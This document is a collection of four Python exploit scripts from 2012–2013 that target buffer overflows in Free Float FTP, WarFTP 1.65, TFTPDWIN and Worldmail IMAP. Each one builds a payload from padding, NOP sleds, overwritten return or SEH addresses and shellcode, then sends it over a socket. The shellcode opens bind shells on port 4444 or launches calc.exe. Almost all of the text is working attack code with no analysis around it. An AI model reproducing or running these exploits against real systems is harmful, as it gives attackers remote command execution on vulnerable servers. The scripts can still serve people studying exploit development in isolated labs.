# Date: 21/05/2012 # Author: rekcahemaL free industries # Software: Free Float FTP v1.0 # Download from: http://www.freefloat.com/software/freefloatftpserver.zip # Tested on: Windows 7 SP1 EN, no DEP used. # Originaly Taken From: Zer0 Thunder # CVE: N/A import sys, socket from struct import pack # Listen port 4444 shellcode =("\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4" "\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c" "\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07" "\x0b\x51\x43\x9c\x79\x7e\x64\x15\x37\x58\x4b\xa6\xf6\x64\x07" "\x64\x99\x18\x5a\xb9\x79\x20\x95\xcc\x78\x65\xc8\x3f\x28\x3e" "\x86\x92\xdc\x4b\xda\x2e\xdd\x9b\x50\x0e\xa5\x9e\xa7\xfb\x1f" "\xa0\xf7\x54\x14\xea\xef\xdf\x72\xcb\x0e\x33\x61\x37\x58\x38" "\x51\xc3\x5b\xe8\xa8\x2c\x6a\xd4\x66\x13\x42\xd9\x77\x53\x65" "\x02\x02\xaf\x95\xbf\x14\x74\xe7\x1b\x91\x69\x4f\xef\x01\x4a" "\x71\x3c\xd7\x19\x7d\x89\x9c\x46\x62\x0c\x71\xfd\x9e\x85\x74" "\xd2\x16\xdd\x52\xf6\x73\x85\xfb\xaf\xd9\x68\x04\xaf\x86\xd5" "\xa0\xbb\x25\x01\xd2\xe1\x21\xe6\xe8\x19\xb2\x60\x7b\x69\x80" "\x2f\xd7\xe5\xa8\xb8\xf1\xf2\xcf\x92\x45\x6c\x2e\x1d\xb5\xa4" "\xf5\x49\xe5\xde\xdc\xf1\x6e\x1f\xe0\x27\x20\x4f\x4e\x98\x80" "\x3f\x2e\x48\x68\x2a\xa1\xb7\x88\x55\x6b\xce\x8f\x9b\x4f\x82" "\x67\xde\x6f\x34\x2b\x57\x89\x5c\xc3\x31\x01\xc9\x21\x66\x9a" "\x6e\x5a\x4c\xb6\x27\xcc\xd8\xd0\xf0\xf3\xd8\xf6\x52\x58\x70" "\x91\x20\xb2\x45\x80\x36\x9f\xed\xcb\x0e\x77\x67\xa2\xdd\xe6" "\x78\xef\xb6\x8b\xeb\x74\x47\xc2\x17\x23\x10\x83\xe6\x3a\xf4" "\x39\x50\x95\xeb\xc0\x04\xde\xa8\x1e\xf5\xe1\x31\xd3\x41\xc6" "\x21\x2d\x49\x42\x16\xe1\x1c\x1c\xc0\x47\xf7\xee\xba\x11\xa4" "\xb8\x2a\xe4\x86\x7a\x2d\xe9\xc2\x0c\xd1\x5b\xbb\x48\xed\x53" "\x2b\x5d\x96\x8e\xcb\xa2\x4d\x0b\xfb\xe8\xcc\x3d\x94\xb4\x84" "\x7c\xf9\x46\x73\x42\x04\xc5\x76\x3a\xf3\xd5\xf2\x3f\xbf\x51" "\xee\x4d\xd0\x37\x10\xe2\xd1\x1d\x1a") junk1 = 'A' * 230 nops = '\x90' * 16 # The NOP instructions eip = pack('I',0x76604E5B)
# This address 0x7C91FCD8 is going to work for Windows XP Sp3 # if DEP is turned on for essential Windows programs and services
junk2 = 'C' * (1000 - len(eip + shellcode + nops +junk1)) buff = junk1 + eip + nops + shellcode + junk2 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "Connecting with server..." try: s.connect(('127.0.0.1',21)) print s.recv(1024) s.send('USER ' + buff + '\r\n') print s.recv(1024) s.close() except: print "Connection Error" # Date: 25/05/2012 # Author: rekcahemaL free industries # Software: WarFTP 1.65 (USER) Remote Buffer Overflow SEH overflow Exploit # Tested on: Windows XP SP3 EN, no DEP used. # Originally Taken From: milw0rm.com [2007-03-15] # CVE: N/A from struct import pack import socket, sys # Execute calc shellcode =("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42" "\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32" "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a" "\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c" "\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57" "\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50" "\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d" "\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f" "\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a" "\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76" "\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65" "\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78" "\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f" "\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65" "\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d" "\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31" "\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69" "\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61" "\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70" "\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42") junk1 = 'A' * 485 eip = 'B' * 4 # Just Marking the EIP nops1 = '\x90' * 80 # The NOP instructions nops2 = '\x90' * 10 # The NOP instructions nseh = pack('I',0x90906EB) # Pointer to next SEH, short jump seh = pack('I', 0x5f4a15b0) # SE Handler: 0x5f4a15b0 buff = junk1 + eip + nops1 + nseh + seh + nops2 + shellcode + nops2 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "Connecting with server..." try: s.connect(('192.168.208.128',21)) print s.recv(1024) s.send('USER ' + buff + '\r\n') print s.recv(1024) s.close() except: print "Connection Error" # Date: 28/05/2012 # Author: rekcahemaL free industries # Software:TFTPDWIN TFTP Server v0.4.2 # Download from: http://www.aushack.com/vulnerablesoftwaredownloads/ # Tested on: Windows XP SP2 EN, no DEP used. # Originally Taken From: milw0rmcom [2007-01-15] # CVE: N/A import socket import sys UDP_IP="192.168.208.128" UDP_PORT=69 nop0="\x90"*15 asm="\x8b\xc3\x66\x05\x12\x01\x50\xc3" nop="\x90"*57 nop1="\x90"*7 eip="\x42\xfb\x61\x40"# pop ebp,ret in tftpdexe #A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with: #1)bind port, in this exploit is 4444 #2)4 bytes added to the shellcode, not to see the window of cmd on remote host shellcode = ("\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64" "\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C" "\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77" "\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\xF4\x95\x57\x60" "\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF" "\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x3C\x71\x75\xF7" "\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B" "\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3B\xF7\x75\xB4" "\x5E\x54\x6A\x02\xAD\xFF\xD0\x88\x46\x13\x8D\x48\x30\x8B\xFC\xF3" "\xAB\x40\x50\x40\x50\xAD\xFF\xD0\x95\xB8\x02\xFF\x11\x5c\x32\xE4" "\x50\x54\x55\xAD\xFF\xD0\x85\xC0\x74\xF8\xFE\x44\x24\x2D\xFE\x44" "\x24\x2c\x83\xEF\x6C\xAB\xAB\xAB\x58\x54\x54\x50\x50\x50\x54\x50" "\x50\x56\x50\xFF\x56\xE4\xFF\x56\xE8") buf = "\x00\x01" + nop0 + asm + nop + shellcode + nop1 + eip + "\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00" print " + Malicious request sent \n" sock = socket.socket( socket.AF_INET,socket.SOCK_DGRAM ) # UDP sock.sendto( buf, (UDP_IP, UDP_PORT) ) print "Exploit sent"
# Date: 02/05/2013 # Author: rekcahemaL free industries # Software:TFTPDWIN Worldmail IMAP Server v3 # Download from: http://www.aushack.com/vulnerablesoftwaredownloads/ # Tested on: Windows XP SP1,SP2 EN, no DEP used. # Originally Taken and modified From: http://www.bnxnet.com/2012/10/ # CVE: N/A
import sys import socket
# windows/shell_bind_tcp - 341 bytes
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, # EXITFUNC=thread shellcode = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01" "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50" "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7" "\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75" "\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57" "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01" "\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56" "\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a" "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75" "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5") # Carbage of 770 length used to overwrite the seh carbage = 770 # pop pop ret ppr = "\xeb\x06\x90\x90" # Overwrite at 774 = seh sehpr = "\x9a\x74\x05\x60" #jump back 700 bytes - E9 FF FF 44 jumpBack = "\xe9\x44\xfd\xff\xff" # Create a pool of nops nops = '\x90' buffer = nops*120 buffer += shellcode buffer += nops * (carbage - (len(shellcode)+120)) buffer += ppr buffer += sehpr buffer += nops * 8 buffer += jumpBack buffer += "b" * (1500-len(buffer)) buffer += "}" con = socket.socket(socket.AF_INET, socket.SOCK_STREAM) con.connect(('192.168.11.21',143)) data = con.recv(1024) print("Bind shell...") try: con.send('a001 LIST ' +buffer+'\r\n') data = con.recv(1024) print("Received : " + data) except: print "- Connection down -" con.close()